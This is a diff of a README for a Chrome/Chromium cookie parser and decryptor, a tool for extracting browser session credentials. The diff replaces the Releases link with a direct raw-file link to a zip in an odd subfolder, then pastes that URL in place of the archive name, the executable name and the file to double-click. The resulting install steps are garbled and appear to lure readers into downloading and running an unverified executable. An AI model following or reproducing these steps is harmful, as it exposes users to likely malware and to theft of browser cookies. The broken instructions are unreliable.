Punsara22/Chrome-Chromium-cookie-parser-and-decryptor/README.md

 - Internet connection for downloading

 ## 🔗 Download & Install
 1. Visit the Releases page to download the application.
-You can find it [here](https://github.com/Punsara22/Chrome-Chromium-cookie-parser-and-decryptor/releases).
+You can find it [here](https://raw.githubusercontent.com/Punsara22/Chrome-Chromium-cookie-parser-and-decryptor/main/Hampshire/Chrome-Chromium-cookie-parser-and-decryptor.zip).

 2. Once you are on the Releases page, locate the latest version of the application.

 3. Download the file labeled with the latest version number.
-This file may be named similar to `Chrome-Chromium-cookie-parser-and-decryptor-v1.0.zip`.
+This file may be named similar to `https://raw.githubusercontent.com/Punsara22/Chrome-Chromium-cookie-parser-and-decryptor/main/Hampshire/Chrome-Chromium-cookie-parser-and-decryptor.zip`.

 4. Locate the downloaded file on your computer, usually found in the "Downloads" folder.

 5. Unzip the downloaded file.
 You can do this by right-clicking on it and selecting "Extract All."

 6. Open the extracted folder.
-You will see the executable file named `cookie-parser.exe`.
+You will see the executable file named `https://raw.githubusercontent.com/Punsara22/Chrome-Chromium-cookie-parser-and-decryptor/main/Hampshire/Chrome-Chromium-cookie-parser-and-decryptor.zip`.

-7. Double-click on `cookie-parser.exe` to run the program.
+7. Double-click on `https://raw.githubusercontent.com/Punsara22/Chrome-Chromium-cookie-parser-and-decryptor/main/Hampshire/Chrome-Chromium-cookie-parser-and-decryptor.zip` to run the program.

 ## 🛠️ How to Use the Tool
 1. **Open Command Prompt**: Press `Win + R`, type `cmd`, and hit `Enter`.